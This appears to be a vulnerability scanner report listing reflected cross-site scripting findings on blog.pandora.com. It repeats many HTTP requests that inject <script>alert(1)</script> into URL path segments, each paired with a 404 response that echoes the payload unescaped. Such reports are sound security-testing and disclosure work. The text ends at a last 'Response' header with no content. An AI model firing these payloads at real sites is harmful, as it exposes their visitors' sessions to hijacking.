GET /pandora/archives/2010/10976b9<script>alert(1)</script>41935888f21/pandora-one-gif.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:42 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/10976b9<script>alert(1)</script>41935888f21/pandora-one-gif.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 27156<script>alert(1)</script>bb3cfa82e19 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/10/pandora-one-gif.html27156<script>alert(1)</script>bb3cfa82e19 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:45 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/10/pandora-one-gif.html27156<script>alert(1)</script>bb3cfa82e19 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 27324<script>alert(1)</script>f28ce60039 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora27324<script>alert(1)</script>f28ce60039/archives/2010/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora27324<script>alert(1)</script>f28ce60039/archives/2010/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 31461<script>alert(1)</script>df1666c9e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives31461<script>alert(1)</script>df1666c9e6/2010/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives31461<script>alert(1)</script>df1666c9e6/2010/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a1142<script>alert(1)</script>f83864e82ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010a1142<script>alert(1)</script>f83864e82ca/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010a1142<script>alert(1)</script>f83864e82ca/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8f51a<script>alert(1)</script>191470466ea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/118f51a<script>alert(1)</script>191470466ea/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/118f51a<script>alert(1)</script>191470466ea/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 72e6e<script>alert(1)</script>09b739b49da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora72e6e<script>alert(1)</script>09b739b49da/archives/2010/11/fantastic-fargo.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:23 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora72e6e<script>alert(1)</script>09b739b49da/archives/2010/11/fantastic-fargo.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a3828<script>alert(1)</script>87512ebd2ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesa3828<script>alert(1)</script>87512ebd2ab/2010/11/fantastic-fargo.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 369 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesa3828<script>alert(1)</script>87512ebd2ab/2010/11/fantastic-fargo.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 39bf5<script>alert(1)</script>8b77ea0b66d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/201039bf5<script>alert(1)</script>8b77ea0b66d/11/fantastic-fargo.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/201039bf5<script>alert(1)</script>8b77ea0b66d/11/fantastic-fargo.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a869d<script>alert(1)</script>14889bb3dee was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/11a869d<script>alert(1)</script>14889bb3dee/fantastic-fargo.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:31 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/11a869d<script>alert(1)</script>14889bb3dee/fantastic-fargo.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f3d62<script>alert(1)</script>1d21570497f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/11/fantastic-fargo.htmlf3d62<script>alert(1)</script>1d21570497f HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/11/fantastic-fargo.htmlf3d62<script>alert(1)</script>1d21570497f was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 23985<script>alert(1)</script>089a1722201 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora23985<script>alert(1)</script>089a1722201/archives/2010/11/sioux-falls-and.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:20 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora23985<script>alert(1)</script>089a1722201/archives/2010/11/sioux-falls-and.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2c61d<script>alert(1)</script>b40d4c584c3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives2c61d<script>alert(1)</script>b40d4c584c3/2010/11/sioux-falls-and.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives2c61d<script>alert(1)</script>b40d4c584c3/2010/11/sioux-falls-and.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5f834<script>alert(1)</script>c656c2ef387 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20105f834<script>alert(1)</script>c656c2ef387/11/sioux-falls-and.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20105f834<script>alert(1)</script>c656c2ef387/11/sioux-falls-and.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4a98f<script>alert(1)</script>e7866274f68 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/114a98f<script>alert(1)</script>e7866274f68/sioux-falls-and.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/114a98f<script>alert(1)</script>e7866274f68/sioux-falls-and.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 83ec8<script>alert(1)</script>d52c4849003 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/11/sioux-falls-and.html83ec8<script>alert(1)</script>d52c4849003 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/11/sioux-falls-and.html83ec8<script>alert(1)</script>d52c4849003 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2056f<script>alert(1)</script>3737c338528 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2056f<script>alert(1)</script>3737c338528/archives/2010/11/town-halls-this.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2056f<script>alert(1)</script>3737c338528/archives/2010/11/town-halls-this.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb220<script>alert(1)</script>cbc4db6c337 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archiveseb220<script>alert(1)</script>cbc4db6c337/2010/11/town-halls-this.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archiveseb220<script>alert(1)</script>cbc4db6c337/2010/11/town-halls-this.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9fcff<script>alert(1)</script>f60856fbcd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20109fcff<script>alert(1)</script>f60856fbcd/11/town-halls-this.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 368 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20109fcff<script>alert(1)</script>f60856fbcd/11/town-halls-this.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b86f5<script>alert(1)</script>dbb2a670324 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/11b86f5<script>alert(1)</script>dbb2a670324/town-halls-this.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
